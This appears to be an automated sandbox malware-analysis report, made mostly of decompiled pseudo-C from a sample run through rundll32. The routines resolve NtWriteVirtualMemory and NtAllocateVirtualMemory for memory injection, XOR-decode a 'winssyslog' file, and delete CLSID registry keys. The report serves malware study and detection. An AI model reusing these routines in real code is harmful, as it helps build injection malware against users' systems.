                                                            • Sleep.KERNEL32(00000096,?,?,?,?,046878D8,?,04639B4C,?), ref: 0463B046
                                                            • LocalAlloc.KERNEL32(00000040,74CB6491,?,?,?,?,046878D8,?,04639B4C,?), ref: 0463B0E3
                                                            • LocalFree.KERNEL32(00000000,00000000,74CB6491,0000003F), ref: 0463B10F
                                                            • Sleep.KERNEL32(0000012C,?,?,?,?,046878D8,?,04639B4C,?), ref: 0463B12D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Sleep$Local$AllocCreateEventFreeObjectSingleWait
                                                            • String ID: ~
                                                            • API String ID: 824083382-1707062198
                                                            • Opcode ID: 6384a5241abb5db3dda29af1ea60a716b5548b5de34d53fda2973410851da2df
                                                            • Instruction ID: d49b76a9a464d1ec9b2fcee0aeaa7bf1ded6de122bf5ef3c44d282e95efa5156
                                                            • Opcode Fuzzy Hash: 6384a5241abb5db3dda29af1ea60a716b5548b5de34d53fda2973410851da2df
                                                            • Instruction Fuzzy Hash: 7A519E75600284AFDB14CF28DC84B65BBE5EB59702F1481ADE9099B392E775FD00CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 83%
                                                            			E0463EEC0(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int _a4) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				void* _v612;
                                                            				signed int _t29;
                                                            				signed int _t38;
                                                            				intOrPtr* _t43;
                                                            				signed int _t45;
                                                            				void* _t51;
                                                            				signed int _t54;
                                                            				intOrPtr* _t57;
                                                            				intOrPtr* _t68;
                                                            				void* _t70;
                                                            				void* _t71;
                                                            				signed int* _t72;
                                                            				intOrPtr* _t75;
                                                            				signed int _t76;
                                                            				void* _t77;
                                                            
                                                            				_t29 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t29 ^ _t76;
                                                            				_t57 =  *0x4687aec; // 0x2ab0b60
                                                            				_t70 = __ecx;
                                                            				_t75 =  *_t57;
                                                            				_v612 = __ecx;
                                                            				while(_t75 != _t57) {
                                                            					while( *_t43 ==  *_t68) {
                                                            						_t43 = _t43 + 4;
                                                            						_t68 = _t68 + 4;
                                                            						_t71 = _t71 - 4;
                                                            						if(_t71 >= 0) {
                                                            							continue;
                                                            						}
                                                            						if( *_t43 ==  *_t68) {
                                                            							_t72 =  *(_t75 + 8);
                                                            							_t45 =  *_t72;
                                                            							__eflags = _t45;
                                                            							if(_t45 == 0) {
                                                            								L14:
                                                            								_t72[0xa] = 0;
                                                            								_t73 =  *(_t75 + 8);
                                                            								__eflags =  *(_t75 + 8);
                                                            								if(__eflags != 0) {
                                                            									E0463E280(_t73, __eflags);
                                                            									_push(0x30);
                                                            									E04655B47(_t73);
                                                            									_t77 = _t77 + 8;
                                                            								}
                                                            								 *((intOrPtr*)( *((intOrPtr*)(_t75 + 4)))) =  *_t75;
                                                            								 *((intOrPtr*)( *_t75 + 4)) =  *((intOrPtr*)(_t75 + 4));
                                                            								 *0x4687af0 =  *0x4687af0 - 1;
                                                            								__eflags =  *0x4687af0;
                                                            								L04655B81(_t75);
                                                            								_t70 = _v612;
                                                            								_t77 = _t77 + 4;
                                                            								goto L17;
                                                            							}
                                                            							__eflags =  *(_t45 + 4);
                                                            							_t72[0xa] = 1;
                                                            							_t72[9] = 0;
                                                            							if( *(_t45 + 4) != 0) {
                                                            								L12:
                                                            								_t51 = _t72[8];
                                                            								__eflags = _t51;
                                                            								if(_t51 != 0) {
                                                            									WaitForSingleObject(_t51, 0xffffffff);
                                                            									CloseHandle(_t72[8]);
                                                            									_t72[8] = 0;
                                                            								}
                                                            								goto L14;
                                                            							}
                                                            							_t66 = _t72[0xb];
                                                            							__eflags = _t72[0xb];
                                                            							if(_t72[0xb] == 0) {
                                                            								goto L14;
                                                            							}
                                                            							_t54 = E0463D260(_t66, "stop");
                                                            							__eflags = _t54;
                                                            							if(_t54 == 0) {
                                                            								goto L14;
                                                            							}
                                                            							 *_t54();
                                                            							goto L12;
                                                            						}
                                                            						break;
                                                            					}
                                                            					_t75 =  *_t75;
                                                            					_t70 = _v612;
                                                            				}
                                                            				L17:
                                                            				__eflags = _a4;
                                                            				if(_a4 != 0) {
                                                            					E04646050(_t57, L"Pg",  &_v88, _t70, _t75);
                                                            					wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s\\%s",  &_v88, _t70);
                                                            					_v612 = 0;
                                                            					_t38 = RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20106,  &_v612);
                                                            					__eflags = _t38;
                                                            					if(_t38 == 0) {
                                                            						SHDeleteKeyW(_v612, 0x467c5d0);
                                                            						RegCloseKey(_v612);
                                                            					}
                                                            				}
                                                            				__eflags = _v8 ^ _t76;
                                                            				return E04655AFE(_v8 ^ _t76);
                                                            			}





















                                                            0x0463eec9
                                                            0x0463eed0
                                                            0x0463eed4
                                                            0x0463eedc
                                                            0x0463eede
                                                            0x0463eee0
                                                            0x0463eee6
                                                            0x0463ef00
                                                            0x0463ef06
                                                            0x0463ef09
                                                            0x0463ef0c
                                                            0x0463ef0f
                                                            0x00000000
                                                            0x00000000
                                                            0x0463ef15
                                                            0x0463ef21
                                                            0x0463ef24
                                                            0x0463ef26
                                                            0x0463ef28
                                                            0x0463ef75
                                                            0x0463ef75
                                                            0x0463ef7c
                                                            0x0463ef7f
                                                            0x0463ef81
                                                            0x0463ef85
                                                            0x0463ef8a
                                                            0x0463ef8d
                                                            0x0463ef92
                                                            0x0463ef92
                                                            0x0463ef9b
                                                            0x0463efa2
                                                            0x0463efa5
                                                            0x0463efa5
                                                            0x0463efab
                                                            0x0463efb0
                                                            0x0463efb6
                                                            0x00000000
                                                            0x0463efb6
                                                            0x0463ef2a
                                                            0x0463ef2e
                                                            0x0463ef35
                                                            0x0463ef3c
                                                            0x0463ef55
                                                            0x0463ef55
                                                            0x0463ef58
                                                            0x0463ef5a
                                                            0x0463ef5f
                                                            0x0463ef68
                                                            0x0463ef6e
                                                            0x0463ef6e
                                                            0x00000000
                                                            0x0463ef5a
                                                            0x0463ef3e
                                                            0x0463ef41
                                                            0x0463ef43
                                                            0x00000000
                                                            0x00000000
                                                            0x0463ef4a
                                                            0x0463ef4f
                                                            0x0463ef51
                                                            0x00000000
                                                            0x00000000
                                                            0x0463ef53
                                                            0x00000000
                                                            0x0463ef53
                                                            0x00000000
                                                            0x0463ef15
                                                            0x0463ef17
                                                            0x0463ef19
                                                            0x0463ef19
                                                            0x0463efb9
                                                            0x0463efb9
                                                            0x0463efbd
                                                            0x0463efc7
                                                            0x0463efdd
                                                            0x0463efe6
                                                            0x0463f00a
                                                            0x0463f010
                                                            0x0463f012
                                                            0x0463f01f
                                                            0x0463f02b
                                                            0x0463f02b
                                                            0x0463f012
                                                            0x0463f036
                                                            0x0463f041

                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000001), ref: 0463EF5F
                                                            • CloseHandle.KERNEL32(?), ref: 0463EF68
                                                            • wsprintfW.USER32 ref: 0463EFDD
                                                            • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020106,00000000), ref: 0463F00A
                                                            • SHDeleteKeyW.SHLWAPI(00000000,0467C5D0), ref: 0463F01F
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0463F02B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close$DeleteHandleObjectOpenSingleWaitwsprintf
                                                            • String ID: SOFTWARE\Classes\CLSID\%s\%s$stop
                                                            • API String ID: 1878782464-96441376
                                                            • Opcode ID: 4d2797b74b5657ff7edf19ea227c9484488527cdf0725762a85812abcdbb05db
                                                            • Instruction ID: 349e8dbc164299e90d76c8c6155f834711889e9f58a5836b29062526f1e757c8
                                                            • Opcode Fuzzy Hash: 4d2797b74b5657ff7edf19ea227c9484488527cdf0725762a85812abcdbb05db
                                                            • Instruction Fuzzy Hash: 3F418D31A00204EFDB24DF64C888B6AB7B9FF48315F14019CE94A97750FB72B945CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 44%
                                                            			E0463B6D0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				short _v528;
                                                            				long _v532;
                                                            				void* _v536;
                                                            				intOrPtr _v540;
                                                            				void* _v544;
                                                            				signed int _t19;
                                                            				void* _t30;
                                                            				long _t41;
                                                            				void* _t56;
                                                            				void* _t58;
                                                            				void* _t59;
                                                            				void* _t61;
                                                            				long _t62;
                                                            				signed int _t65;
                                                            
                                                            				_t19 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t19 ^ _t65;
                                                            				_v540 = __ecx;
                                                            				_push(0);
                                                            				_v532 = 0;
                                                            				E04646370(__ebx, L"winssyslog",  &_v528, __edi, __esi, 8);
                                                            				_t58 = CreateFileW( &_v528, 0x80000000, 1, 0, 3, 0x80, 0);
                                                            				_v544 = _t58;
                                                            				_t72 = _t58 - 0xffffffff;
                                                            				if(_t58 == 0xffffffff) {
                                                            					__eflags = _v8 ^ _t65;
                                                            					return E04655AFE(_v8 ^ _t65);
                                                            				} else {
                                                            					_push(__ebx);
                                                            					_push(__esi);
                                                            					_t41 = GetFileSize(_t58, 0);
                                                            					_push(_t41);
                                                            					_t61 = L04655B55(L"winssyslog", __esi, _t72);
                                                            					_v536 = _t61;
                                                            					ReadFile(_t58, _t61, _t41,  &_v532, 0);
                                                            					_t30 = 0;
                                                            					if(_t41 != 0) {
                                                            						if(_t41 >= 0x20) {
                                                            							asm("movaps xmm2, [0x467f990]");
                                                            							_t56 = _t41 - (_t41 & 0x0000001f);
                                                            							asm("o16 nop [eax+eax]");
                                                            							do {
                                                            								asm("movups xmm0, [esi+eax]");
                                                            								asm("movaps xmm1, xmm2");
                                                            								asm("pxor xmm1, xmm0");
                                                            								asm("movups [esi+eax], xmm1");
                                                            								asm("movups xmm0, [esi+eax+0x10]");
                                                            								asm("pxor xmm0, xmm2");
                                                            								asm("movups [esi+eax+0x10], xmm0");
                                                            								_t30 = _t30 + 0x20;
                                                            							} while (_t30 < _t56);
                                                            						}
                                                            						while(_t30 < _t41) {
                                                            							 *(_t30 + _t61) =  *(_t30 + _t61) ^ 0x00000058;
                                                            							_t30 = _t30 + 1;
                                                            						}
                                                            					}
                                                            					_t11 = _t41 + 1; // 0x1
                                                            					_t62 = _t11;
                                                            					_t59 = LocalAlloc(0x40, _t62);
                                                            					_t13 = _t59 + 1; // 0x1
                                                            					 *_t59 = 0x7f;
                                                            					E0465E060(_t13, _v536, _t41);
                                                            					_push(0x3f);
                                                            					_push(_t62);
                                                            					E04631C60( *((intOrPtr*)(_v540 + 4)));
                                                            					LocalFree(_t59);
                                                            					L04655B0F(_v536);
                                                            					CloseHandle(_v544);
                                                            					return E04655AFE(_v8 ^ _t65, _t59);
                                                            				}
                                                            			}


















                                                            0x0463b6d9
                                                            0x0463b6e0
                                                            0x0463b6e4
                                                            0x0463b6f0
                                                            0x0463b6f9
                                                            0x0463b703
                                                            0x0463b72a
                                                            0x0463b72c
                                                            0x0463b732
                                                            0x0463b735
                                                            0x0463b82e
                                                            0x0463b839
                                                            0x0463b73b
                                                            0x0463b73b
                                                            0x0463b73c
                                                            0x0463b746
                                                            0x0463b748
                                                            0x0463b751
                                                            0x0463b759
                                                            0x0463b765
                                                            0x0463b76b
                                                            0x0463b76f
                                                            0x0463b774
                                                            0x0463b776
                                                            0x0463b784
                                                            0x0463b786
                                                            0x0463b790
                                                            0x0463b790
                                                            0x0463b794
                                                            0x0463b797
                                                            0x0463b79b
                                                            0x0463b79f
                                                            0x0463b7a4
                                                            0x0463b7a8
                                                            0x0463b7ad
                                                            0x0463b7b0
                                                            0x0463b790
                                                            0x0463b7b6
                                                            0x0463b7b8
                                                            0x0463b7bc
                                                            0x0463b7bd
                                                            0x0463b7b6
                                                            0x0463b7c1
                                                            0x0463b7c1
                                                            0x0463b7cd
                                                            0x0463b7d7
                                                            0x0463b7da
                                                            0x0463b7de
                                                            0x0463b7ef
                                                            0x0463b7f1
                                                            0x0463b7f3
                                                            0x0463b7fb
                                                            0x0463b802
                                                            0x0463b810
                                                            0x0463b828
                                                            0x0463b828

                                                            APIs
                                                              • Part of subcall function 04646370: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 04646396
                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,74CB6490), ref: 0463B724
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,046878D8,?,74CB6490), ref: 0463B740
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,046878D8,?,74CB6490), ref: 0463B765
                                                            • LocalAlloc.KERNEL32(00000040,00000001,?,74CB6490), ref: 0463B7C7
                                                            • LocalFree.KERNEL32(00000000,00000000,00000001,0000003F,?,?,00000000,?,74CB6490), ref: 0463B7FB
                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?,74CB6490), ref: 0463B810
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$Local$AllocCloseCreateDirectoryFreeHandleReadSizeSystem
                                                            • String ID: $winssyslog
                                                            • API String ID: 245316060-3650450327
                                                            • Opcode ID: 1ba8482ebfc2e0b663795ab6eb20c1cf68771c9715bc41139843c97dba0b0d54
                                                            • Instruction ID: 7eaec0fcb26947642b36056d0623754a1deff926b412b52bb5086496005922fb
                                                            • Opcode Fuzzy Hash: 1ba8482ebfc2e0b663795ab6eb20c1cf68771c9715bc41139843c97dba0b0d54
                                                            • Instruction Fuzzy Hash: AA418B31A003086BE7249F74CC89BBAB7B8EF55715F1042ACE90DA7292FF707A848750
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 60%
                                                            			E04648EC0(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                            				intOrPtr _v8;
                                                            				intOrPtr _v16;
                                                            				char _v20;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				char _t11;
                                                            				intOrPtr* _t16;
                                                            				intOrPtr _t27;
                                                            				void* _t28;
                                                            				intOrPtr _t30;
                                                            				_Unknown_base(*)()* _t31;
                                                            				intOrPtr _t33;
                                                            				void* _t34;
                                                            				intOrPtr* _t35;
                                                            				struct HINSTANCE__* _t36;
                                                            				intOrPtr _t39;
                                                            				void* _t41;
                                                            
                                                            				_t33 = __edx;
                                                            				_t39 =  *0x4687b54; // 0x7ffc
                                                            				_t27 = __edx;
                                                            				_v8 = __ecx;
                                                            				_t30 =  *0x4687b50; // 0x320ea6c0
                                                            				_push(_t34);
                                                            				if(_t30 != 0 || _t39 != 0) {
                                                            					L7:
                                                            					_t35 = _a16;
                                                            					if(_t35 == 0) {
                                                            						_t11 = 0;
                                                            					} else {
                                                            						_t11 =  *_t35;
                                                            					}
                                                            					_v20 = _t11;
                                                            					asm("cdq");
                                                            					_push(_t33);
                                                            					_push( &_v20);
                                                            					_push(0);
                                                            					_push(_a12);
                                                            					_v16 = 0;
                                                            					asm("cdq");
                                                            					_push(_t33);
                                                            					_push(_t27);
                                                            					_push(_a8);
                                                            					asm("cdq");
                                                            					_t28 = E046481B0(_t30, _t39, 5, _v8, _t33, _a4);
                                                            					if(_t28 != 0 || _t33 != 0) {
                                                            						_t16 =  *0x4687b48;
                                                            						if(_t16 == 0) {
                                                            							L17:
                                                            							_t36 = GetModuleHandleW(L"ntdll.dll");
                                                            							 *0x4687b48 = GetProcAddress(_t36, "RtlNtStatusToDosError");
                                                            							_t31 = GetProcAddress(_t36, "RtlSetLastWin32Error");
                                                            							_t16 =  *0x4687b48;
                                                            							 *0x4687b28 = _t31;
                                                            						} else {
                                                            							_t31 =  *0x4687b28;
                                                            							if(_t31 == 0) {
                                                            								goto L17;
                                                            							}
                                                            						}
                                                            						if(_t16 != 0 && _t31 != 0) {
                                                            							RtlRestoreLastWin32Error( *_t16(_t28));
                                                            						}
                                                            						goto L21;
                                                            					} else {
                                                            						if(_t35 != 0) {
                                                            							 *_t35 = _v20;
                                                            						}
                                                            						return 1;
                                                            					}
                                                            				} else {
                                                            					_t25 =  *0x4687b40; // 0x32050000
                                                            					_t33 =  *0x4687b44; // 0x7ffc
                                                            					if(_t25 == 0 && _t33 == 0) {
                                                            						 *0x4687b40 = L04648390(_t30);
                                                            						 *0x4687b44 = _t33;
                                                            					}
                                                            					_t30 = L04648B90(_t27, "NtWriteVirtualMemory", _t33, _t34, _t39, _t25, _t33);
                                                            					_t41 = _t41 + 8;
                                                            					 *0x4687b50 = _t30;
                                                            					_t39 = _t33;
                                                            					 *0x4687b54 = _t39;
                                                            					if(_t30 != 0 || _t39 != 0) {
                                                            						goto L7;
                                                            					} else {
                                                            						L21:
                                                            						return 0;
                                                            					}
                                                            				}
                                                            			}





















                                                            0x04648ec0
                                                            0x04648ec8
                                                            0x04648ece
                                                            0x04648ed0
                                                            0x04648ed3
                                                            0x04648ed9
                                                            0x04648edc
                                                            0x04648f30
                                                            0x04648f30
                                                            0x04648f35
                                                            0x04648f3b
                                                            0x04648f37
                                                            0x04648f37
                                                            0x04648f37
                                                            0x04648f3d
                                                            0x04648f43
                                                            0x04648f44
                                                            0x04648f45
                                                            0x04648f46
                                                            0x04648f48
                                                            0x04648f4d
                                                            0x04648f54
                                                            0x04648f55
                                                            0x04648f56
                                                            0x04648f57
                                                            0x04648f60
                                                            0x04648f6c
                                                            0x04648f73
                                                            0x04648f8e
                                                            0x04648f95
                                                            0x04648fa1
                                                            0x04648fb2
                                                            0x04648fc2
                                                            0x04648fc9
                                                            0x04648fcb
                                                            0x04648fd0
                                                            0x04648f97
                                                            0x04648f97
                                                            0x04648f9f
                                                            0x00000000
                                                            0x00000000
                                                            0x04648f9f
                                                            0x04648fd8
                                                            0x04648fe2
                                                            0x04648fe2
                                                            0x00000000
                                                            0x04648f79
                                                            0x04648f7b
                                                            0x04648f80
                                                            0x04648f80
                                                            0x04648f8d
                                                            0x04648f8d
                                                            0x04648ee2
                                                            0x04648ee2
                                                            0x04648ee7
                                                            0x04648eef
                                                            0x04648efa
                                                            0x04648eff
                                                            0x04648eff
                                                            0x04648f11
                                                            0x04648f13
                                                            0x04648f16
                                                            0x04648f1c
                                                            0x04648f1e
                                                            0x04648f26
                                                            0x00000000
                                                            0x04648fe8
                                                            0x04648fe8
                                                            0x04648ff0
                                                            0x04648ff0
                                                            0x04648f26

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,?,00000000,00000000,0464BFF5,046490E9,00000000), ref: 04648FA6
                                                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 04648FBA
                                                            • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 04648FC7
                                                            • RtlRestoreLastWin32Error.NTDLL(00000000), ref: 04648FE2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$ErrorHandleLastModuleRestoreWin32
                                                            • String ID: NtWriteVirtualMemory$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                            • API String ID: 3496116238-1394624420
                                                            • Opcode ID: 9ea417efe3c837e6150c003dc69f0229e0f462a56bd22c32f7edc16ecc3bbc47
                                                            • Instruction ID: 5130e0296daaa507cbb4995eb76b68322eafbc78dd2db47898165724abef8b6c
                                                            • Opcode Fuzzy Hash: 9ea417efe3c837e6150c003dc69f0229e0f462a56bd22c32f7edc16ecc3bbc47
                                                            • Instruction Fuzzy Hash: 71315079A11205ABDF64AE59AC40A7A77ABEBD87A5B14112DFD08D3300F734AC008BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 51%
                                                            			E04648C60(intOrPtr __ecx, char __edx) {
                                                            				intOrPtr _v8;
                                                            				void* _v16;
                                                            				char _v20;
                                                            				intOrPtr _v24;
                                                            				char _v28;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				intOrPtr* _t13;
                                                            				char _t23;
                                                            				void* _t24;
                                                            				_Unknown_base(*)()* _t26;
                                                            				char _t28;
                                                            				intOrPtr _t31;
                                                            				struct HINSTANCE__* _t32;
                                                            				intOrPtr _t33;
                                                            				void* _t35;
                                                            
                                                            				_t28 = __edx;
                                                            				_t33 =  *0x4687b34; // 0x7ffc
                                                            				_t23 = __edx;
                                                            				_t31 =  *0x4687b30; // 0x320ea280
                                                            				_v8 = __ecx;
                                                            				if(_t31 != 0 || _t33 != 0) {
                                                            					L7:
                                                            					_push(0);
                                                            					_push(0x40);
                                                            					_push(0);
                                                            					_push(0x3000);
                                                            					_v28 = _t23;
                                                            					asm("cdq");
                                                            					asm("xorps xmm0, xmm0");
                                                            					_push(_t28);
                                                            					_push( &_v28);
                                                            					_push(0);
                                                            					_push(0);
                                                            					asm("movlpd [ebp-0x10], xmm0");
                                                            					asm("cdq");
                                                            					_push(_t28);
                                                            					asm("cdq");
                                                            					_v24 = 0;
                                                            					_t24 = E046481B0(_t31, _t33, 6, _v8, _t28,  &_v20);
                                                            					if(_t24 != 0 || _t28 != 0) {
                                                            						_t13 =  *0x4687b48;
                                                            						if(_t13 == 0) {
                                                            							L12:
                                                            							_t32 = GetModuleHandleW(L"ntdll.dll");
                                                            							 *0x4687b48 = GetProcAddress(_t32, "RtlNtStatusToDosError");
                                                            							_t26 = GetProcAddress(_t32, "RtlSetLastWin32Error");
                                                            							_t13 =  *0x4687b48;
                                                            							 *0x4687b28 = _t26;
                                                            						} else {
                                                            							_t26 =  *0x4687b28;
                                                            							if(_t26 == 0) {
                                                            								goto L12;
                                                            							}
                                                            						}
                                                            						if(_t13 != 0 && _t26 != 0) {
                                                            							RtlRestoreLastWin32Error( *_t13(_t24));
                                                            						}
                                                            						goto L16;
                                                            					} else {
                                                            						return _v20;
                                                            					}
                                                            				} else {
                                                            					_t21 =  *0x4687b40; // 0x32050000
                                                            					_t28 =  *0x4687b44; // 0x7ffc
                                                            					if(_t21 == 0 && _t28 == 0) {
                                                            						 *0x4687b40 = L04648390(__ecx);
                                                            						 *0x4687b44 = _t28;
                                                            					}
                                                            					_t31 = L04648B90(_t23, "NtAllocateVirtualMemory", _t28, _t31, _t33, _t21, _t28);
                                                            					_t35 = _t35 + 8;
                                                            					 *0x4687b30 = _t31;
                                                            					_t33 = _t28;
                                                            					 *0x4687b34 = _t33;
                                                            					if(_t31 != 0 || _t33 != 0) {
                                                            						goto L7;
                                                            					} else {
                                                            						L16:
                                                            						return 0;
                                                            					}
                                                            				}
                                                            			}




















                                                            0x04648c60
                                                            0x04648c68
                                                            0x04648c6e
                                                            0x04648c71
                                                            0x04648c77
                                                            0x04648c7c
                                                            0x04648cd0
                                                            0x04648cd0
                                                            0x04648cd2
                                                            0x04648cd4
                                                            0x04648cd6
                                                            0x04648cde
                                                            0x04648ce1
                                                            0x04648ce2
                                                            0x04648ce5
                                                            0x04648ce6
                                                            0x04648ce7
                                                            0x04648ce9
                                                            0x04648cee
                                                            0x04648cf3
                                                            0x04648cf4
                                                            0x04648cf9
                                                            0x04648d00
                                                            0x04648d0c
                                                            0x04648d13
                                                            0x04648d26
                                                            0x04648d2d
                                                            0x04648d39
                                                            0x04648d4a
                                                            0x04648d5a
                                                            0x04648d61
                                                            0x04648d63
                                                            0x04648d68
                                                            0x04648d2f
                                                            0x04648d2f
                                                            0x04648d37
                                                            0x00000000
                                                            0x00000000
                                                            0x04648d37
                                                            0x04648d70
                                                            0x04648d7a
                                                            0x04648d7a
                                                            0x00000000
                                                            0x04648d19
                                                            0x04648d25
                                                            0x04648d25
                                                            0x04648c82
                                                            0x04648c82
                                                            0x04648c87
                                                            0x04648c8f
                                                            0x04648c9a
                                                            0x04648c9f
                                                            0x04648c9f
                                                            0x04648cb1
                                                            0x04648cb3
                                                            0x04648cb6
                                                            0x04648cbc
                                                            0x04648cbe
                                                            0x04648cc6
                                                            0x00000000
                                                            0x04648d82
                                                            0x04648d82
                                                            0x04648d8a
                                                            0x04648d8a
                                                            0x04648cc6

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,?,?,?,74CB57B0,00000000,0464BFF5), ref: 04648D3E
                                                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 04648D52
                                                            • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 04648D5F
                                                            • RtlRestoreLastWin32Error.NTDLL(00000000), ref: 04648D7A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$ErrorHandleLastModuleRestoreWin32
                                                            • String ID: NtAllocateVirtualMemory$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                            • API String ID: 3496116238-3017390355
                                                            • Opcode ID: ba0078821fd44f3704e76e02538802f77a72642d6216aaa36a9334d84088bfa4
                                                            • Instruction ID: 95cb905df2c895f41ffe4a8c4583bdf2a5798ca0effdad671a6826394d496fcc
                                                            • Opcode Fuzzy Hash: ba0078821fd44f3704e76e02538802f77a72642d6216aaa36a9334d84088bfa4
                                                            • Instruction Fuzzy Hash: 81319BB9A41305ABEB24FF559C40B7B77AAEBD4661F24515EED04E3340F774AC0046A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 64%
                                                            			E04648D90(intOrPtr __ecx, intOrPtr __edx, char _a4, intOrPtr _a8) {
                                                            				intOrPtr _v8;
                                                            				intOrPtr _v16;
                                                            				char _v20;
                                                            				intOrPtr _v24;
                                                            				char _v28;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				intOrPtr* _t18;
                                                            				intOrPtr _t28;
                                                            				void* _t29;
                                                            				_Unknown_base(*)()* _t31;
                                                            				intOrPtr _t33;
                                                            				intOrPtr _t34;
                                                            				struct HINSTANCE__* _t35;
                                                            				intOrPtr _t36;
                                                            				void* _t38;
                                                            
                                                            				_t33 = __edx;
                                                            				_t36 =  *0x4687b24; // 0x7ffc
                                                            				_t28 = __edx;
                                                            				_t34 =  *0x4687b20; // 0x320ea340
                                                            				_v8 = __ecx;
                                                            				if(_t34 != 0 || _t36 != 0) {
                                                            					L7:
                                                            					_v28 = _a4;
                                                            					_push(0);
                                                            					_v24 = _a8;
                                                            					_push(0x4000);
                                                            					asm("cdq");
                                                            					_push(_t33);
                                                            					_push( &_v20);
                                                            					_v20 = _t28;
                                                            					asm("cdq");
                                                            					_push(_t33);
                                                            					asm("cdq");
                                                            					_v16 = 0;
                                                            					_t29 = E046481B0(_t34, _t36, 4, _v8, _t33,  &_v28);
                                                            					if(_t29 != 0 || _t33 != 0) {
                                                            						_t18 =  *0x4687b48;
                                                            						if(_t18 == 0) {
                                                            							L12:
                                                            							_t35 = GetModuleHandleW(L"ntdll.dll");
                                                            							 *0x4687b48 = GetProcAddress(_t35, "RtlNtStatusToDosError");
                                                            							_t31 = GetProcAddress(_t35, "RtlSetLastWin32Error");
                                                            							_t18 =  *0x4687b48;
                                                            							 *0x4687b28 = _t31;
                                                            						} else {
                                                            							_t31 =  *0x4687b28;
                                                            							if(_t31 == 0) {
                                                            								goto L12;
                                                            							}
                                                            						}
                                                            						if(_t18 != 0 && _t31 != 0) {
                                                            							RtlRestoreLastWin32Error( *_t18(_t29));
                                                            						}
                                                            						goto L16;
                                                            					} else {
                                                            						_t11 = _t29 + 1; // 0x1
                                                            						return _t11;
                                                            					}
                                                            				} else {
                                                            					_t26 =  *0x4687b40; // 0x32050000
                                                            					_t33 =  *0x4687b44; // 0x7ffc
                                                            					if(_t26 == 0 && _t33 == 0) {
                                                            						 *0x4687b40 = L04648390(__ecx);
                                                            						 *0x4687b44 = _t33;
                                                            					}
